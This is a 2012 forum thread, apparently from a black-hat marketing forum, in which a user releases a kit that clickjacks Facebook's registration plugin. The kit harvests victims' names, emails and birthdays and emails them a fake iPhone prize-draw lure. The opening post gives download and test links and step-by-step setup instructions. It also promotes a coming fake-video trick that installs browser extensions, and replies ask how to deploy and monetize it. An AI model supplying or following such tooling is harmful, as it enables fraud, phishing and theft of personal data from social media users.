1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

[DOWNLOAD] New Facebook Exploit Discovered By Me. Coded By Me. Grab It!

Discussion in 'FaceBook' started by StellaArtois, Feb 19, 2012.

  1. StellaArtois

    StellaArtois BANNED BANNED

    Joined:
    Jun 13, 2011
    Messages:
    104
    Likes Received:
    354
    To cut a long story short Facebook are suing the living s**t out of me. Can't discuss any more than that, but I'm on a war path now. A battle against them.

    So, here is the first release. Nobody has done this before, so I am releasing it here.

    Test: http://bbmluv.com/reg/
    Download: http://www.mediafire.com/?4i8frybeodve7xn

    Basically what it does is collects the users email, name and birthday, and sends them an email. It click jacks a Facebook plugin.

    Instructions:

    Open index.php and edit the line that contains "meta property="og:url"" with your own URL. Scroll down to the line that contains "https://www.facebook.com/plugins/registration.php" and edit the redirect URL with your own domain. Remember to add r.php to the end of your link.

    Open r.php and edit the SITE_URL, the APP ID and APP SECRET. If you would like to modify the message that's sent to the user via email just edit the $message variable in r.php. Remember to manually add line breaks to the message using "\n".

    And that's all there is to it. I tested using "BBC Leaks iPhone 5 Images". Once the user types in the pretend captcha they are redirected to r.php which sends them an email with the link to the leaked images, and also tells them they've been entered into a free iPhone 4 prize draw and they need to provide shipping details. In the email they are linked to win.php which then selects an iPhone 4 offer based on their country.

    I'll be posting a couple fresh stuff over the month.

    Feel free to ask questions.

    Next Release: http://www.addcovers.net/video/video.html ... this allows you to post a pretend flash video on your wall that alerts the user they are missing a plugin. At the press of a button it will download an extension. Test it, paste that link into your Facebook. I will be including the chrome and FF extension templates with it. Will release that tomorrow maybe :D
     
    • Thanks Thanks x 25
    Last edited: Feb 19, 2012
  2. MaxWeber

    MaxWeber Regular Member

    Joined:
    May 26, 2008
    Messages:
    267
    Likes Received:
    5,133
    VT Scan
    Code:
    https://www.virustotal.com/file/f0cf616bdbfb9f7949a85089f4fd87232f7edcfa61dbe3e6d6e1ba2ed010ff35/analysis/1329667352/
    File name: fbreg.zip
    Detection ratio: 0 / 43
    Analysis date: 2012-02-19 16:02:32 UTC ( 1 minute ago )
     
    • Thanks Thanks x 1
  3. pathart

    pathart Senior Member

    Joined:
    Dec 18, 2009
    Messages:
    845
    Likes Received:
    653
    Location:
    Dublin - Ireland
    Great share thanks, just out of curiosity what are conversions like on the iphone 4 method so far?
     
  4. StellaArtois

    StellaArtois BANNED BANNED

    Joined:
    Jun 13, 2011
    Messages:
    104
    Likes Received:
    354
    iPhone 4 stuff has been abused in the past. I wasn't actually testing for conversions but just used it as an example for the script.
     
  5. jairathnem

    jairathnem Power Member

    Joined:
    Oct 27, 2010
    Messages:
    550
    Likes Received:
    316
    Occupation:
    Student
    Location:
    Incredible India!
    Home Page:
    In in index.php what link do we add to "meta property="og:url"

    Just a sample link will do :)

    thanks :)
     
  6. StellaArtois

    StellaArtois BANNED BANNED

    Joined:
    Jun 13, 2011
    Messages:
    104
    Likes Received:
    354
    The URL the script is hosted on. Im my case it was http://bbmluv.com/reg/. I only use the Open Graph so I could post the link around Facebook.
     
  7. tsree

    tsree Newbie

    Joined:
    Sep 24, 2011
    Messages:
    32
    Likes Received:
    2
    I wish you all the best in your war path against Facebook. But do with care
     
  8. jaacoozee

    jaacoozee Newbie

    Joined:
    Feb 19, 2012
    Messages:
    6
    Likes Received:
    0
    Home Page:
    thaaanks mate . downloaded and virus free
     
  9. biglia

    biglia Regular Member

    Joined:
    Jun 28, 2008
    Messages:
    201
    Likes Received:
    37
    That Facebook Registration plugin is really scary. I guess they will put a captcha on it sooner or later.
     
  10. hawke

    hawke Power Member

    Joined:
    Nov 14, 2008
    Messages:
    644
    Likes Received:
    533
    Location:
    Ohio
    If your being sued by FB for this Exploit, why would you post it here in an open forum? or anywhere for that matter?


    I'm not a lawyer, and don't pretend to be, but common sense would tell me, If they ever found out that I posted the code here, that it would prove intent and could very well, Put my case in jeopardy.....

    I mean, You do what you want, i'm just curious about it...
     
  11. StellaArtois

    StellaArtois BANNED BANNED

    Joined:
    Jun 13, 2011
    Messages:
    104
    Likes Received:
    354
    Yeah I'm guessing so. Once the learn about the clickjacking they will either remove the iFrame option or stick a captcha on it.
     
  12. StellaArtois

    StellaArtois BANNED BANNED

    Joined:
    Jun 13, 2011
    Messages:
    104
    Likes Received:
    354
    They are not suing over this. They are suing over a whole list of things. I am just winding them up by saying "Hey Facebook, look, I don't give a shite".

    Legal issue do not scare me. Never have, never will. The get out clause is to purchase gold bullion with any cash, and declare yourself bankrupt.

    People wind themselves up fearing being sued.
     
    • Thanks Thanks x 2
  13. scarer

    scarer BANNED BANNED

    Joined:
    Oct 23, 2011
    Messages:
    193
    Likes Received:
    78
    i cant understand, when i type captcha in your domain, the continue button never works. where should we click so that it takes our email and other information etc.
     
  14. StellaArtois

    StellaArtois BANNED BANNED

    Joined:
    Jun 13, 2011
    Messages:
    104
    Likes Received:
    354
    Are you logged into Facebook whilst you're testing it?
     
  15. wanfirdaus

    wanfirdaus Regular Member

    Joined:
    Dec 6, 2010
    Messages:
    357
    Likes Received:
    132
    Occupation:
    IM
    Location:
    WP Login
    Home Page:
    Yep logged in
     
  16. xzzxpimpxzzx

    xzzxpimpxzzx Regular Member

    Joined:
    May 5, 2007
    Messages:
    402
    Likes Received:
    307
    Occupation:
    i work online
    Location:
    Costa Rica
    Jr.vip section:p
     
    • Thanks Thanks x 3
  17. D3lux3

    D3lux3 Power Member

    Joined:
    Aug 22, 2009
    Messages:
    523
    Likes Received:
    189
    +rep and +1 for jr.vip
     
  18. chad362wiley

    chad362wiley Supreme Member

    Joined:
    Dec 8, 2011
    Messages:
    1,341
    Likes Received:
    782
    Occupation:
    n/a
    Location:
    Behind you
    Home Page:
    send it to jr vip
     
  19. walandio

    walandio Senior Member

    Joined:
    Jun 27, 2008
    Messages:
    1,198
    Likes Received:
    684
    Location:
    Pilipinas
    wow dude you rock!.. thanks for the share.. gotta download this before it get's to jr.vip
     
  20. MAC-11

    MAC-11 Junior Member

    Joined:
    Feb 3, 2012
    Messages:
    168
    Likes Received:
    96
    Occupation:
    marketing/ sales
    Location:
    Canada
    whats the best way to monetize this?